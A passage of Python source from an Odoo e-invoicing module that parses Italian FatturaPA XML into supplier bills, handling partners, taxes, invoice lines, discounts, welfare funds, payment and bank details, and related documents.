self.log_inconsistency(\n _(\"Register Province ( %s ) not present \" \"in your system\")\n % ProvinciaAlbo\n )\n else:\n vals[\"register_province\"] = prov[0].id\n if cedPrest.Sede.Provincia:\n Provincia = cedPrest.Sede.Provincia\n prov_sede = self.ProvinceByCode(Provincia)\n if not prov_sede:\n self.log_inconsistency(\n _(\"Province ( %s ) not present in your system\") % Provincia\n )\n else:\n vals[\"state_id\"] = prov_sede[0].id\n\n vals[\"register_code\"] = cedPrest.DatiAnagrafici.NumeroIscrizioneAlbo\n vals[\"register_regdate\"] = cedPrest.DatiAnagrafici.DataIscrizioneAlbo\n\n if cedPrest.DatiAnagrafici.RegimeFiscale:\n rfPos = cedPrest.DatiAnagrafici.RegimeFiscale\n FiscalPos = fiscalPosModel.search([(\"code\", \"=\", rfPos)])\n if not FiscalPos:\n raise UserError(\n _(\"Tax Regime %s not present in your system.\") % rfPos\n )\n else:\n vals[\"register_fiscalpos\"] = FiscalPos[0].id\n\n if cedPrest.IscrizioneREA:\n REA = cedPrest.IscrizioneREA\n offices = self.ProvinceByCode(REA.Ufficio)\n rea_nr = REA.NumeroREA\n\n if not offices:\n office_id = False\n self.log_inconsistency(\n _(\n \"REA Office Province Code ( %s ) not present in \"\n \"your system\"\n )\n % REA.Ufficio\n )\n else:\n office_id = offices[0].id\n vals[\"rea_office\"] = office_id\n\n rea_domain = [\n (\"rea_code\", \"=\", rea_nr),\n (\"company_id\", \"=\", partner_company_id),\n (\"id\", \"!=\", partner_id),\n ]\n if office_id:\n rea_domain.append((\"rea_office\", \"=\", office_id))\n rea_partners = partner_model.search(rea_domain)\n if rea_partners:\n rea_names = \", \".join(rea_partners.mapped(\"name\"))\n p_name = partner_model.browse(partner_id).name\n self.log_inconsistency(\n _(\n \"Current invoice is from {} with REA Code\"\n \" {}. Yet it seems that partners {} have the same\"\n \" REA Code. This code should be unique; please fix\"\n \" it.\"\n ).format(p_name, rea_nr, rea_names)\n )\n else:\n vals[\"rea_code\"] = REA.NumeroREA\n\n vals[\"rea_capital\"] = REA.CapitaleSociale or 0.0\n vals[\"rea_member_type\"] = REA.SocioUnico or False\n vals[\"rea_liquidation_state\"] = REA.StatoLiquidazione or False\n\n if cedPrest.Contatti:\n if cedPrest.Contatti.Telefono:\n vals[\"phone\"] = cedPrest.Contatti.Telefono\n if cedPrest.Contatti.Email:\n vals[\"email\"] = cedPrest.Contatti.Email\n partner_model.browse(partner_id).write(vals)\n return partner_id\n\n def getCarrirerPartner(self, Carrier):\n partner_model = self.env[\"res.partner\"]\n partner_id = self.getPartnerBase(Carrier.DatiAnagraficiVettore)\n no_contact_update = False\n if partner_id:\n no_contact_update = partner_model.browse(\n partner_id\n ).electronic_invoice_no_contact_update\n if partner_id and not no_contact_update:\n vals = {\n \"license_number\": Carrier.DatiAnagraficiVettore.NumeroLicenzaGuida\n or \"\",\n }\n partner_model.browse(partner_id).write(vals)\n return partner_id\n\n def _prepare_generic_line_data(self, line):\n retLine = {}\n account_taxes = self.get_account_taxes(line.AliquotaIVA, line.Natura)\n if account_taxes:\n retLine[\"tax_ids\"] = [fields.Command.set([account_taxes[0].id])]\n else:\n retLine[\"tax_ids\"] = [fields.Command.clear()]\n return retLine\n\n def _get_default_product_taxes(self, tax_field_name):\n \"\"\"Return default tax for field `product.product.`.\"\"\"\n company = self.env.company\n default_taxes_ids = self.env[\"ir.default\"].get(\n \"product.product\",\n tax_field_name,\n company_id=company.id,\n )\n tax_model = self.env[\"account.tax\"]\n if default_taxes_ids is not None:\n default_taxes = tax_model.browse(default_taxes_ids)\n default_tax = first(default_taxes)\n else:\n default_tax = tax_model.browse()\n return default_tax\n\n def _get_account_tax_domain(self, amount):\n return [\n (\"type_tax_use\", \"=\", \"purchase\"),\n (\"amount\", \"=\", amount),\n ]\n\n def _get_zero_kind_account_tax(self, Natura):\n tax_amount = 0\n tax_domain = self._get_account_tax_domain(tax_amount)\n tax_domain = expression.AND(\n [\n tax_domain,\n [\n (\"kind_id.code\", \"=\", Natura),\n ],\n ]\n )\n account_taxes = self.env[\"account.tax\"].search(\n tax_domain,\n order=\"sequence\",\n )\n account_tax = first(account_taxes)\n if not account_taxes:\n self.log_inconsistency(\n _(\n \"No tax with percentage \"\n \"%(percentage)s and nature %(nature)s found. Please configure this tax.\",\n percentage=tax_amount,\n nature=Natura,\n )\n )\n elif len(account_taxes) > 1:\n self.log_inconsistency(\n _(\n \"Too many taxes with percentage \"\n \"%(percentage)s and nature %(nature)s found. \"\n \"Tax %(tax)s with lower priority has \"\n \"been set on invoice lines.\",\n percentage=tax_amount,\n nature=Natura,\n tax=account_tax.description,\n )\n )\n return account_tax\n\n def _get_amount_account_tax(self, tax_amount):\n tax_domain = self._get_account_tax_domain(tax_amount)\n tax_domain = expression.AND(\n [\n tax_domain,\n [\n (\"price_include\", \"=\", False),\n # partially deductible VAT must be set by user\n (\"children_tax_ids\", \"=\", False),\n ],\n ]\n )\n account_taxes = self.env[\"account.tax\"].search(\n tax_domain,\n order=\"sequence\",\n )\n account_tax = first(account_taxes)\n if not account_taxes:\n self.log_inconsistency(\n _(\n \"XML contains tax with percentage '%s' \"\n \"but it does not exist in your system\",\n tax_amount,\n )\n )\n # check if there are multiple taxes with\n # same percentage\n elif len(account_taxes) > 1:\n # just logging because this is an usual case: see split payment\n _logger.warning(\n _(\n \"Too many taxes with percentage equals \"\n \"to '%s'.\\nFix it if required\",\n tax_amount,\n )\n )\n # if there are multiple taxes with same percentage\n # and there is a default tax with this percentage,\n # set taxes list equal to supplier_taxes_id\n default_tax = self._get_default_product_taxes(\"supplier_taxes_id\")\n if default_tax and default_tax.amount == tax_amount:\n account_tax = default_tax\n return account_tax\n\n def get_account_taxes(self, AliquotaIVA, Natura):\n tax_amount = float(AliquotaIVA)\n if tax_amount == 0.0 and Natura:\n account_tax = self._get_zero_kind_account_tax(Natura)\n else:\n account_tax = self._get_amount_account_tax(tax_amount)\n return account_tax\n\n def get_line_product(self, line, partner):\n product = self.env[\"product.product\"].browse()\n\n # Search the product using supplier infos\n supplier_info = self.env[\"product.supplierinfo\"]\n partner_supplier_info = supplier_info.search(\n [\n (\"partner_id\", \"=\", partner.id),\n ]\n )\n found_supplier_infos = supplier_info.browse()\n if len(line.CodiceArticolo or []) == 1:\n supplier_code = line.CodiceArticolo[0].CodiceValore\n found_supplier_infos = supplier_info.search(\n [\n (\"id\", \"in\", partner_supplier_info.ids),\n (\"product_code\", \"=\", supplier_code),\n ]\n )\n if not found_supplier_infos:\n supplier_name = line.Descrizione\n found_supplier_infos = supplier_info.search(\n [\n (\"id\", \"in\", partner_supplier_info.ids),\n (\"product_name\", \"=\", supplier_name),\n ]\n )\n\n if found_supplier_infos:\n products = found_supplier_infos.mapped(\"product_id\")\n if len(products) == 1:\n product = first(products)\n else:\n templates = found_supplier_infos.mapped(\"product_tmpl_id\")\n if len(templates) == 1:\n product = templates.product_variant_id\n\n if not product and partner.e_invoice_default_product_id:\n product = partner.e_invoice_default_product_id\n return product\n\n def adjust_accounting_data(self, product, line_vals):\n account = self.get_credit_account(product)\n line_vals[\"account_id\"] = account.id\n\n new_tax = None\n if len(product.product_tmpl_id.supplier_taxes_id) == 1:\n new_tax = product.product_tmpl_id.supplier_taxes_id[0]\n elif len(account.tax_ids) == 1:\n new_tax = account.tax_ids[0]\n line_tax = self.env[\"account.tax\"]\n if line_vals.get(\"tax_ids\") and line_vals[\"tax_ids\"][0] == fields.Command.SET:\n line_tax_id = line_vals[\"tax_ids\"][0][2][0]\n line_tax = self.env[\"account.tax\"].browse(line_tax_id)\n if new_tax and line_tax and new_tax != line_tax:\n if new_tax._get_tax_amount() != line_tax._get_tax_amount():\n self.log_inconsistency(\n _(\n \"XML contains tax %(line_tax)s. \"\n \"Product %(product)s has tax %(new_tax)s. Using \"\n \"the XML one\"\n )\n % {\n \"line_tax\": line_tax.name,\n \"product\": product.name,\n \"new_tax\": new_tax.name,\n }\n )\n else:\n # If product has the same amount of the one in XML,\n # I use it. Typical case: 22% det 50%\n line_vals[\"tax_ids\"] = [(6, 0, [new_tax.id])]\n\n # move_line.tax_ids\n # move_line.name\n # move_line.sequence\n # move_line.account_id\n # move_line.price_unit\n # move_line.quantity\n def _prepareInvoiceLineAliquota(self, credit_account_id, line, nline):\n retLine = {}\n account_taxes = self.get_account_taxes(line.AliquotaIVA, line.Natura)\n if account_taxes:\n retLine[\"tax_ids\"] = [fields.Command.set([account_taxes[0].id])]\n else:\n retLine[\"tax_ids\"] = [fields.Command.clear()]\n\n retLine.update(\n {\n \"name\": \"Riepilogo Aliquota {}\".format(line.AliquotaIVA),\n \"sequence\": nline,\n \"account_id\": credit_account_id,\n \"price_unit\": float(abs(line.ImponibileImporto)),\n }\n )\n return retLine\n\n # move_line.name\n # move_line.sequence\n # move_line.account_id\n # move_line.price_unit\n # move_line.quantity\n # move_line.discount\n # move_line.admin_ref\n # move_line.invoice_line_tax_wt_ids\n def _prepareInvoiceLine(self, credit_account_id, line, wt_founds=False):\n retLine = self._prepare_generic_line_data(line)\n retLine.update(\n {\n \"name\": line.Descrizione,\n \"sequence\": int(line.NumeroLinea),\n \"account_id\": credit_account_id,\n \"price_unit\": float(line.PrezzoUnitario),\n \"display_type\": \"product\",\n }\n )\n if line.Quantita is None:\n retLine[\"quantity\"] = 1.0\n else:\n retLine[\"quantity\"] = float(line.Quantita)\n if (\n float(line.PrezzoUnitario)\n and line.Quantita\n and float(line.Quantita)\n and line.ScontoMaggiorazione # Quantita not required\n ):\n retLine[\"discount\"] = self._computeDiscount(line)\n if line.RiferimentoAmministrazione:\n retLine[\"admin_ref\"] = line.RiferimentoAmministrazione\n if wt_founds and line.Ritenuta:\n retLine[\"invoice_line_tax_wt_ids\"] = [(6, 0, [x.id for x in wt_founds])]\n\n return retLine\n\n def _prepareRelDocsLine(self, invoice_id, line, doc_type):\n res = []\n lineref = line.RiferimentoNumeroLinea or False\n IdDoc = line.IdDocumento or \"Error\"\n Data = line.Data or False\n NumItem = line.NumItem or \"\"\n Code = line.CodiceCommessaConvenzione or \"\"\n Cig = line.CodiceCIG or \"\"\n Cup = line.CodiceCUP or \"\"\n invoice_lineid = False\n if lineref:\n for numline in lineref:\n invoice_lineid = False\n invoice_line_model = self.env[\"account.move.line\"]\n invoice_lines = invoice_line_model.search(\n [\n (\"move_id\", \"=\", invoice_id),\n (\"sequence\", \"=\", int(numline)),\n ]\n )\n if invoice_lines:\n invoice_lineid = invoice_lines[0].id\n val = {\n \"type\": doc_type,\n \"name\": IdDoc,\n \"lineRef\": numline,\n \"invoice_line_id\": invoice_lineid,\n \"invoice_id\": invoice_id,\n \"date\": Data,\n \"numitem\": NumItem,\n \"code\": Code,\n \"cig\": Cig,\n \"cup\": Cup,\n }\n res.append(val)\n else:\n val = {\n \"type\": doc_type,\n \"name\": IdDoc,\n \"invoice_line_id\": invoice_lineid,\n \"invoice_id\": invoice_id,\n \"date\": Data,\n \"numitem\": NumItem,\n \"code\": Code,\n \"cig\": Cig,\n \"cup\": Cup,\n }\n res.append(val)\n return res\n\n def _prepareWelfareLine(self, invoice_id, line):\n TipoCassa = line.TipoCassa or False\n AlCassa = line.AlCassa and (float(line.AlCassa) / 100) or None\n ImportoContributoCassa = (\n line.ImportoContributoCassa and float(line.ImportoContributoCassa) or None\n )\n ImponibileCassa = line.ImponibileCassa and float(line.ImponibileCassa) or None\n AliquotaIVA = line.AliquotaIVA and (float(line.AliquotaIVA) / 100) or None\n Ritenuta = line.Ritenuta or \"\"\n Natura = line.Natura or False\n kind_id = False\n if Natura:\n kind = self.env[\"account.tax.kind\"].search([(\"code\", \"=\", Natura)])\n if not kind:\n self.log_inconsistency(_(\"Tax kind %s not found\") % Natura)\n else:\n kind_id = kind[0].id\n\n RiferimentoAmministrazione = line.RiferimentoAmministrazione or \"\"\n WelfareTypeModel = self.env[\"welfare.fund.type\"]\n if not TipoCassa:\n raise UserError(_(\"Welfare Fund is not defined.\"))\n WelfareType = WelfareTypeModel.search([(\"name\", \"=\", TipoCassa)])\n\n res = {\n \"welfare_rate_tax\": AlCassa,\n \"welfare_amount_tax\": ImportoContributoCassa,\n \"welfare_taxable\": ImponibileCassa,\n \"welfare_Iva_tax\": AliquotaIVA,\n \"subjected_withholding\": Ritenuta,\n \"kind_id\": kind_id,\n \"pa_line_code\": RiferimentoAmministrazione,\n \"invoice_id\": invoice_id,\n }\n if not WelfareType:\n raise UserError(\n _(\"Welfare Fund %s not present in your system.\") % TipoCassa\n )\n else:\n res[\"name\"] = WelfareType[0].id\n\n return res\n\n def _prepareDiscRisePriceLine(self, line_id, line):\n Tipo = line.Tipo or False\n Percentuale = line.Percentuale and float(line.Percentuale) or 0.0\n Importo = line.Importo and float(line.Importo) or 0.0\n res = {\n \"percentage\": Percentuale,\n \"amount\": Importo,\n self.env.context.get(\"drtype\"): line_id,\n }\n res[\"name\"] = Tipo\n\n return res\n\n def _computeDiscount(self, DettaglioLinea):\n line_total = float(DettaglioLinea.PrezzoTotale)\n line_unit = line_total / float(DettaglioLinea.Quantita)\n discount = (1 - (line_unit / float(DettaglioLinea.PrezzoUnitario))) * 100.0\n return discount\n\n def _addGlobalDiscount(self, invoice_id, DatiGeneraliDocumento):\n discount = 0.0\n if (\n DatiGeneraliDocumento.ScontoMaggiorazione\n and self.e_invoice_detail_level == \"2\"\n ):\n invoice = self.env[\"account.move\"].browse(invoice_id)\n for DiscRise in DatiGeneraliDocumento.ScontoMaggiorazione:\n if DiscRise.Percentuale:\n amount = invoice.amount_total * (float(DiscRise.Percentuale) / 100)\n if DiscRise.Tipo == \"SC\":\n discount -= amount\n elif DiscRise.Tipo == \"MG\":\n discount += amount\n elif DiscRise.Importo:\n if DiscRise.Tipo == \"SC\":\n discount -= float(DiscRise.Importo)\n elif DiscRise.Tipo == \"MG\":\n discount += float(DiscRise.Importo)\n company = invoice.company_id\n global_discount_product = company.sconto_maggiorazione_product_id\n credit_account = self.get_credit_account(\n product=global_discount_product,\n )\n line_vals = {\n \"move_id\": invoice_id,\n \"name\": _(\"Global bill discount from document general data\"),\n \"account_id\": credit_account.id,\n \"price_unit\": discount,\n \"quantity\": 1,\n }\n if global_discount_product:\n line_vals[\"product_id\"] = global_discount_product.id\n line_vals[\"name\"] = global_discount_product.name\n self.adjust_accounting_data(global_discount_product, line_vals)\n else:\n line_vals[\"tax_ids\"] = [fields.Command.clear()]\n self.env[\"account.move.line\"].with_context(\n check_move_validity=False\n ).create(line_vals)\n return True\n\n def _createPaymentsLine(self, payment_id, line, partner_id, invoice):\n details = line.DettaglioPagamento or False\n if details:\n PaymentModel = self.env[\"fatturapa.payment.detail\"]\n PaymentMethodModel = self.env[\"fatturapa.payment_method\"]\n BankModel = self.env[\"res.bank\"]\n PartnerBankModel = self.env[\"res.partner.bank\"]\n for dline in details:\n method = PaymentMethodModel.search(\n [(\"code\", \"=\", dline.ModalitaPagamento)]\n )\n if not method:\n raise UserError(\n _(\"Payment method %s is not defined in your system.\")\n % dline.ModalitaPagamento\n )\n val = {\n \"recipient\": dline.Beneficiario,\n \"fatturapa_pm_id\": method[0].id,\n \"payment_term_start\": dline.DataRiferimentoTerminiPagamento\n or False,\n \"payment_days\": dline.GiorniTerminiPagamento or 0,\n \"payment_due_date\": dline.DataScadenzaPagamento or False,\n \"payment_amount\": dline.ImportoPagamento or 0.0,\n \"post_office_code\": dline.CodUfficioPostale or \"\",\n \"recepit_surname\": dline.CognomeQuietanzante or \"\",\n \"recepit_name\": dline.NomeQuietanzante or \"\",\n \"recepit_cf\": dline.CFQuietanzante or \"\",\n \"recepit_title\": dline.TitoloQuietanzante or \"1\",\n \"payment_bank_name\": dline.IstitutoFinanziario or \"\",\n \"payment_bank_iban\": dline.IBAN or \"\",\n \"payment_bank_abi\": dline.ABI or \"\",\n \"payment_bank_cab\": dline.CAB or \"\",\n \"payment_bank_bic\": dline.BIC or \"\",\n \"payment_bank\": False,\n \"prepayment_discount\": dline.ScontoPagamentoAnticipato or 0.0,\n \"max_payment_date\": dline.DataLimitePagamentoAnticipato or False,\n \"penalty_amount\": dline.PenalitaPagamentiRitardati or 0.0,\n \"penalty_date\": dline.DataDecorrenzaPenale or False,\n \"payment_code\": dline.CodicePagamento or \"\",\n \"payment_data_id\": payment_id,\n }\n bank = False\n payment_bank_id = False\n if dline.BIC:\n banks = BankModel.search([(\"bic\", \"=\", dline.BIC.strip())])\n if not banks:\n if not dline.IstitutoFinanziario:\n self.log_inconsistency(\n _(\n \"Name of Bank with BIC '%s' is not set.\"\n \" Can't create bank\"\n )\n % dline.BIC\n )\n else:\n bank = BankModel.create(\n {\n \"name\": dline.IstitutoFinanziario,\n \"bic\": dline.BIC,\n }\n )\n else:\n bank = banks[0]\n if dline.IBAN:\n iban = dline.IBAN.strip()\n SearchDom = [\n (\"acc_number\", \"=\", pretty_iban(iban)),\n (\"partner_id\", \"=\", partner_id),\n ]\n payment_bank_id = False\n payment_banks = PartnerBankModel.search(SearchDom)\n if not payment_banks and not bank:\n self.log_inconsistency(\n _(\n \"BIC is required and not exist in Xml\\n\"\n \"Curr bank data is: \\n\"\n \"IBAN: %(iban)s\\n\"\n \"Bank Name: %(bank)s\\n\"\n )\n % {\n \"iban\": iban or \"\",\n \"bank\": dline.IstitutoFinanziario or \"\",\n }\n )\n elif not payment_banks and bank:\n existing_account = PartnerBankModel.search(\n [\n (\"acc_number\", \"=\", iban),\n (\"company_id\", \"=\", invoice.company_id.id),\n ]\n )\n if existing_account:\n self.log_inconsistency(\n _(\"Bank account %s already exists\") % iban\n )\n else:\n payment_bank_id = PartnerBankModel.create(\n {\n \"acc_number\": iban,\n \"partner_id\": partner_id,\n \"bank_id\": bank.id,\n \"bank_name\": dline.IstitutoFinanziario or bank.name,\n \"bank_bic\": dline.BIC or bank.bic,\n }\n ).id\n if payment_banks:\n payment_bank_id = payment_banks[0].id\n\n if payment_bank_id:\n val[\"payment_bank\"] = payment_bank_id\n PaymentModel.create(val)\n return True\n\n # TODO sul partner?\n def set_StabileOrganizzazione(self, CedentePrestatore, invoice):\n if CedentePrestatore.StabileOrganizzazione:\n invoice.efatt_stabile_organizzazione_indirizzo = (\n CedentePrestatore.StabileOrganizzazione.Indirizzo\n )\n invoice.efatt_stabile_organizzazione_civico = (\n CedentePrestatore.StabileOrganizzazione.NumeroCivico\n )\n invoice.efatt_stabile_organizzazione_cap = (\n CedentePrestatore.StabileOrganizzazione.CAP\n )\n invoice.efatt_stabile_organizzazione_comune = (\n CedentePrestatore.StabileOrganizzazione.Comune\n )\n invoice.efatt_stabile_organizzazione_provincia = (\n CedentePrestatore.StabileOrganizzazione.Provincia\n )\n invoice.efatt_stabile_organizzazione_nazione = (\n CedentePrestatore.StabileOrganizzazione.Nazione\n )\n\n def _get_journal_domain(self, company):\n return [\n (\"type\", \"=\", \"purchase\"),\n (\"company_id\", \"=\", company.id),\n ]\n\n def get_journal(self, company):\n domain = self._get_journal_domain(company)\n journal = self.env[\"account.journal\"].search(\n domain,\n limit=1,\n )\n if not journal:\n exception = self._get_missing_journal_exception(company)\n raise exception\n return journal\n\n def _get_missing_journal_exception(self, company):\n return UserError(\n _(\n \"Define a purchase journal for this company: '%(name)s' (id: %(id)s).\",\n name=company.name,\n id=company.id,\n )\n )\n\n def create_e_invoice_line(self, line):\n vals = {\n \"line_number\": int(line.NumeroLinea or 0),\n \"service_type\": line.TipoCessionePrestazione,\n \"name\": line.Descrizione,\n \"qty\": float(line.Quantita or 0),\n \"uom\": line.UnitaMisura,\n \"period_start_date\": line.DataInizioPeriodo,\n \"period_end_date\": line.DataFinePeriodo,\n \"unit_price\": float(line.PrezzoUnitario or 0),\n \"total_price\": float(line.PrezzoTotale or 0),\n \"tax_amount\": float(line.AliquotaIVA or 0),\n \"wt_amount\": line.Ritenuta,\n \"tax_kind\": line.Natura,\n \"admin_ref\": line.RiferimentoAmministrazione,\n }\n einvoiceline = self.env[\"einvoice.line\"].create(vals)\n if line.CodiceArticolo:\n for caline in line.CodiceArticolo:\n self.env[\"fatturapa.article.code\"].create(\n {\n \"name\": caline.CodiceTipo or \"\",\n \"code_val\": caline.CodiceValore or \"\",\n \"e_invoice_line_id\": einvoiceline.id,\n }\n )\n if line.ScontoMaggiorazione:\n for DiscRisePriceLine in line.ScontoMaggiorazione:\n DiscRisePriceVals = self.with_context(\n drtype=\"e_invoice_line_id\"\n )._prepareDiscRisePriceLine(einvoiceline.id, DiscRisePriceLine)\n self.env[\"discount.rise.price\"].create(DiscRisePriceVals)\n if line.AltriDatiGestionali:\n for dato in line.AltriDatiGestionali:\n self.env[\"einvoice.line.other.data\"].create(\n {\n \"name\": dato.TipoDato,\n \"text_ref\": dato.RiferimentoTesto,\n \"num_ref\": float(dato.RiferimentoNumero or 0),\n \"date_ref\": dato.RiferimentoData,\n \"e_invoice_line_id\": einvoiceline.id,\n }\n )\n return einvoiceline\n\n def get_credit_account(self, product=None):\n \"\"\"\n Try to get default credit account for invoice line looking in\n\n 1) product (if provided)\n 2) journal\n 3) company default.\n\n :param product: Product whose expense account will be used\n :return: The account found\n \"\"\"\n credit_account = self.env[\"account.account\"].browse()\n\n # If there is a product, get its default expense account\n if product:\n template = product.product_tmpl_id\n accounts_dict = template.get_product_accounts()\n credit_account = accounts_dict[\"expense\"]\n\n company = self.env.company\n # Search in journal\n journal = self.get_journal(company)\n if not credit_account:\n credit_account = journal.default_account_id\n\n # Search in company defaults\n if not credit_account:\n credit_account = (\n self.env[\"ir.property\"]\n .with_company(company)\n ._get(\"property_account_expense_categ_id\", \"product.category\")\n )\n\n if not credit_account:\n raise UserError(\n _(\n \"Please configure Default Credit Account \"\n \"in Journal '{journal}' \"\n \"or check default expense account \"\n \"for company '{company}'.\"\n ).format(\n journal=journal.display_name,\n company=company.display_name,\n )\n )\n\n return credit_account\n\n def _get_currency(self, FatturaBody):\n # currency 2.1.1.2\n currency_code = FatturaBody.DatiGenerali.DatiGeneraliDocumento.Divisa\n currency = self.env[\"res.currency\"].search(\n [\n (\"name\", \"=\", currency_code),\n ]\n )\n if not currency:\n raise UserError(\n _(\n \"No currency found with code %s.\",\n currency_code,\n )\n )\n return currency\n\n def _get_fiscal_document_type(self, FatturaBody):\n fiscal_document_type_code = (\n FatturaBody.DatiGenerali.DatiGeneraliDocumento.TipoDocumento\n )\n if fiscal_document_type_code:\n fiscal_document_type = self.env[\"fiscal.document.type\"].search(\n [\n (\"code\", \"=\", fiscal_document_type_code),\n ],\n limit=1,\n )\n if not fiscal_document_type:\n raise UserError(\n _(\n \"Document type %s not handled.\",\n fiscal_document_type_code,\n )\n )\n else:\n fiscal_document_type = self.env[\"fiscal.document.type\"].browse()\n return fiscal_document_type\n\n def _get_invoice_type(self, fiscal_document_type):\n if fiscal_document_type.code == \"TD04\":\n invoice_type = \"in_refund\"\n else:\n invoice_type = \"in_invoice\"\n return invoice_type\n\n def _get_received_date(self, attachment):\n received_date = attachment.e_invoice_received_date\n if not received_date:\n received_date = attachment.create_date\n received_date = received_date.date()\n return received_date\n\n def _prepare_invoice_values(self, fatt, fatturapa_attachment, FatturaBody, partner):\n company = self.env.company\n currency = self._get_currency(FatturaBody)\n purchase_journal = self.get_journal(company)\n comment = \"\"\n\n # 2.1.1\n fiscal_document_type = self._get_fiscal_document_type(FatturaBody)\n invoice_type = self._get_invoice_type(fiscal_document_type)\n\n # 2.1.1.11\n causLst = FatturaBody.DatiGenerali.DatiGeneraliDocumento.Causale\n if causLst:\n for rel_doc in causLst:\n comment += rel_doc + \"\\n\"\n if comment:\n comment = \"\" + comment + \" \"\n\n e_invoice_received_date = self._get_received_date(fatturapa_attachment)\n\n e_invoice_date = datetime.strptime(\n FatturaBody.DatiGenerali.DatiGeneraliDocumento.Data, \"%Y-%m-%d\"\n ).date()\n\n delivery_partner_id = partner.address_get([\"delivery\"])[\"delivery\"]\n delivery_partner = self.env[\"res.partner\"].browse(delivery_partner_id)\n fiscal_position = self.env[\"account.fiscal.position\"]._get_fiscal_position(\n partner,\n delivery=delivery_partner,\n )\n\n invoice_data = {\n \"e_invoice_received_date\": e_invoice_received_date,\n \"invoice_date\": e_invoice_date,\n \"date\": e_invoice_received_date\n if company.in_invoice_registration_date == \"rec_date\"\n else e_invoice_date,\n \"fiscal_document_type_id\": fiscal_document_type.id,\n \"sender\": fatt.FatturaElettronicaHeader.SoggettoEmittente or False,\n \"move_type\": invoice_type,\n \"partner_id\": partner.id,\n \"currency_id\": currency.id,\n \"journal_id\": purchase_journal.id,\n # 'origin': xmlData.datiOrdineAcquisto,\n \"fiscal_position_id\": fiscal_position.id,\n \"invoice_payment_term_id\": partner.property_supplier_payment_term_id.id,\n \"company_id\": company.id,\n \"fatturapa_attachment_in_id\": fatturapa_attachment.id,\n \"narration\": comment,\n }\n\n # 2.1.1.12\n self.set_art73(FatturaBody, invoice_data)\n\n self.set_e_invoice_lines(FatturaBody, invoice_data)\n return invoice_data\n\n def invoiceCreate(self, fatt, fatturapa_attachment, FatturaBody, partner_id):\n partner_model = self.env[\"res.partner\"]\n partner = partner_model.browse(partner_id)\n invoice_data = self._prepare_invoice_values(\n fatt,\n fatturapa_attachment,\n FatturaBody,\n partner,\n )\n\n # 2.1.1.5\n found_withholding_taxes = self.set_withholding_tax(FatturaBody, invoice_data)\n\n invoice = self.env[\"account.move\"].create(invoice_data)\n credit_account = self.get_credit_account()\n\n invoice_lines = []\n # 2.2.1\n invoice_lines.extend(\n self.set_invoice_line_ids(\n FatturaBody,\n credit_account.id,\n partner,\n found_withholding_taxes,\n invoice,\n )\n )\n\n # 2.1.1.7\n invoice_lines.extend(\n self.set_welfares_fund(\n FatturaBody, credit_account.id, invoice, found_withholding_taxes\n )\n )\n\n # 2.1.1.10\n invoice_lines.extend(self.set_efatt_rounding(FatturaBody, invoice))\n\n invoice.with_context(check_move_validity=False).update(\n {\"invoice_line_ids\": [(6, 0, invoice_lines)]}\n )\n\n invoice._onchange_invoice_line_wt_ids()\n\n rel_docs_dict = {\n # 2.1.2\n \"order\": FatturaBody.DatiGenerali.DatiOrdineAcquisto,\n # 2.1.3\n \"contract\": FatturaBody.DatiGenerali.DatiContratto,\n # 2.1.4\n \"agreement\": FatturaBody.DatiGenerali.DatiConvenzione,\n # 2.1.5\n \"reception\": FatturaBody.DatiGenerali.DatiRicezione,\n # 2.1.6\n \"invoice\": FatturaBody.DatiGenerali.DatiFattureCollegate,\n }\n\n for rel_doc_key, rel_doc_data in rel_docs_dict.items():\n if not rel_doc_data:\n continue\n for rel_doc in rel_doc_data:\n doc_datas = self._prepareRelDocsLine(invoice.id, rel_doc, rel_doc_key)\n for doc_data in doc_datas:\n # Note for v12: must take advantage of batch creation\n self.env[\"fatturapa.related_document_type\"].create(doc_data)\n\n # 2.1.7\n self.set_activity_progress(FatturaBody, invoice)\n\n # 2.1.8\n self.set_ddt_data(FatturaBody, invoice)\n\n # 2.1.9\n self.set_delivery_data(FatturaBody, invoice)\n\n # 2.2.2\n self.set_summary_data(FatturaBody, invoice)\n\n # 2.1.10\n self.set_parent_invoice_data(FatturaBody, invoice)\n\n # 2.3\n self.set_vehicles_data(FatturaBody, invoice)\n\n # 2.4\n self.set_payments_data(FatturaBody, invoice, partner_id)\n\n # 2.5\n self.set_attachments_data(FatturaBody, invoice)\n\n self._addGlobalDiscount(\n invoice.id, FatturaBody.DatiGenerali.DatiGeneraliDocumento\n )\n\n if self.e_invoice_detail_level != \"1\":\n self.set_roundings(FatturaBody, invoice)\n\n self.set_vendor_bill_data(FatturaBody, invoice)\n\n # this can happen with refunds with negative amounts\n invoice.process_negative_lines()\n return invoice\n\n def set_vendor_bill_data(self, FatturaBody, invoice):\n if not invoice.invoice_date:\n invoice.update(\n {\n \"invoice_date\": datetime.strptime(\n FatturaBody.DatiGenerali.DatiGeneraliDocumento.Data, \"%Y-%m-%d\"\n ).date(),\n }\n )\n if not invoice.ref:\n today = fields.Date.context_today(self)\n x = invoice.line_ids.filtered(\n lambda line: line.account_id.account_type\n in (\"asset_receivable\", \"liability_payable\")\n ).sorted(lambda line: line.date_maturity or today)\n if x:\n x[-1].name = FatturaBody.DatiGenerali.DatiGeneraliDocumento.Numero\n invoice.ref = FatturaBody.DatiGenerali.DatiGeneraliDocumento.Numero\n if not invoice.payment_reference:\n invoice.payment_reference = invoice.ref\n\n def set_parent_invoice_data(self, FatturaBody, invoice):\n ParentInvoice = FatturaBody.DatiGenerali.FatturaPrincipale\n if ParentInvoice:\n parentinv_vals = {\n \"related_invoice_code\": ParentInvoice.NumeroFatturaPrincipale or \"\",\n \"related_invoice_date\": ParentInvoice.DataFatturaPrincipale or False,\n }\n invoice.write(parentinv_vals)\n\n def set_vehicles_data(self, FatturaBody, invoice):\n Vehicle = FatturaBody.DatiVeicoli\n if Vehicle:\n veicle_vals = {\n \"vehicle_registration\": Vehicle.Data or False,\n \"total_travel\": Vehicle.TotalePercorso or \"\",\n }\n invoice.write(veicle_vals)\n\n def set_attachments_data(self, FatturaBody, invoice):\n invoice_id = invoice.id\n AttachmentsData = FatturaBody.Allegati\n if AttachmentsData:\n self.env[\"fatturapa.attachment.in\"].extract_attachments(\n AttachmentsData, invoice_id\n )\n\n def set_ddt_data(self, FatturaBody, invoice):\n invoice_id = invoice.id\n DdtDatas = FatturaBody.DatiGenerali.DatiDDT\n if not DdtDatas:\n return\n invoice_line_model = self.env[\"account.move.line\"]\n DdTModel = self.env[\"fatturapa.related_ddt\"]\n for DdtDataLine in DdtDatas:\n if not DdtDataLine.RiferimentoNumeroLinea:\n DdTModel.create(\n {\n \"name\": DdtDataLine.NumeroDDT or \"\",\n \"date\": DdtDataLine.DataDDT or False,\n \"invoice_id\": invoice_id,\n }\n )\n else:\n for 